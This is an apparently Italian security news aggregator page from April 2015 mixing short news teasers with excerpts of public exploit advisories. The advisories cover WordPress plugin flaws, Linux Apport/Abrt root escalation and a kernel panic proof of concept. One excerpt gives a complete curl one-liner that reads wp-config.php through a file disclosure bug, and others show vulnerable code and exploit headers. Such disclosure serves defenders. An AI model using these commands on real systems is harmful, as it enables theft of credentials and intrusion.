Hackers Could Commandeer New Planes Through Passenger Wi-Fi

17 aprile 2015 - Fonte: http://www.mondounix.com

Hackers Could Commandeer New Planes Through Passenger Wi-Fi

Seven years after the Federal Aviation Administration first warned Boeing that its new Dreamliner aircraft had a Wi-Fi design that made it vulnerable to hacking, a new government report suggests the passenger jets might still be vulnerable.

Boeing 787 Dreamliner jets, as well as Airbus A350 and A380 aircraft, have Wi-Fi passenger networks that use the same network as the avionics systems of the planes, raising the possibility that a hacker could hijack the navigation system or commandeer the plane through the in-plane network, according to the US Government Accountability Office, which released a report about the planes today.

A hacker would...

Leggi il seguito »

WordPress Fusion Engage Local File Disclosure

16 aprile 2015 - Fonte: http://www.mondounix.com
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to.. I'm actually not sure. Something to do with video embedding.
 
Anyway, it has a LFD. Here's the relevant code..
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
    }add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...

Leggi il seguito »

WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

16 aprile 2015 - Fonte: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability
 
 
 Location file: /view/actions.php
 
 This is the bugged ajax functions wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
...

Leggi il seguito »

WordPress Windows Desktop And iPhone Photo Uploader File Upload

16 aprile 2015 - Fonte: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
 
////////////////////////
///...

Leggi il seguito »

Linux Abrt / Apport Race Condition / Symlink

16 aprile 2015 - Fonte: http://www.mondounix.com
Hello, this is CVE-2015-1318 and CVE-2015-1862 (essentially the same bugs in two different implementations, apport and abrt respectively). These were discussed on the vendors list last week.
 
If the first character of kern.core_pattern sysctl is a pipe, the kernel will invoke the specified program, and pass it the core on stdin. Apport (Ubuntu) and Abrt (Fedora) use this feature to analyze and log crashes.
 
Since the introduction of containers, Abrt and Apport have attempted to transparently handle namespaces by chrooting into the same root as the crashing program [1] [2]. Unfortunately, this is incorrect because root cannot safely execve() after a chroot into a user specified directory.
 
Furthermore, Abrt suffers from numerous...

Leggi il seguito »

Linux Apport/Abrt Local Root Exploit

15 aprile 2015 - Fonte: http://www.mondounix.com
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/auxv.h>
#include <sys/wait.h>
 
# warning this file must be compiled with -static
 
//
// Apport/Abrt Vulnerability Demo Exploit.
//
//  Apport: CVE-2015-1318
//  Abrt:   CVE-2015-1862
// 
//   -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To...

Leggi il seguito »

Linux splice_write Kernel Panic

14 aprile 2015 - Fonte: http://www.mondounix.com
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-7822_poc.c
 * 
 * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
 * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, 
 * as demonstrated by use of a file descriptor associated with an ext4 filesystem. 
 *
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * Works on ext4 filesystem
 * Tested on Ubuntu with 3.13 and 3.14 kernels
 * 
 * Compile with gcc -fno-stack-protector...

Leggi il seguito »

Chinese hacker group has been spying on governments for a decade, says FireEye

14 aprile 2015 - Fonte: http://www.mondounix.com

Chinese hacker group has been spying on governments for a decade, says FireEye

A CHINESE CYBER THREAT GROUP is said to have one of the longest ever cyber espionage operation histories, having spied on governments for over a decade.

The APT 30 hacker group was uncovered by security firm FireEye, which claims that it has been spying on Asia Pacific countries' governments from as far back as 2004.

FireEye said that APT 30 takes a special interest in political developments in Southeast Asia and India, and is particularly active at the time of Association of Southeast Asian Nations summits. It also focuses on regional issues and territorial disputes...

Leggi il seguito »

Latest version of OS X closes backdoor bug that gives root

13 aprile 2015 - Fonte: http://www.mondounix.com

Latest version of OS X closes backdoor bug that gives root

For at least four years, a bug in Apple's OS X gave untrusted users—and possibly remote hackers with only limited control of their target—unfettered "root" privileges over Macs.

The vulnerability is being called a "hidden backdoor" by Emil Kvarnhammar, the security researcher who discovered the bug and privately reported it to Apple. It's probably more accurate to describe it the equivalent of an unpublished programming interface that allowed users with admin or even lower-level standard privileges to gain root. The privilege escalation flaw was fixed in a massive security update Apple released Wednesday for the 10.10,...

Leggi il seguito »

WordPress Shareaholic 7.6.0.3 Cross Site Scripting

8 aprile 2015 - Fonte: http://www.mondounix.com
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
  $location = $_POST['location'];
  $app_name = $location['app_name'];
  ShareaholicUtilities::update_options(array(
...

Leggi il seguito »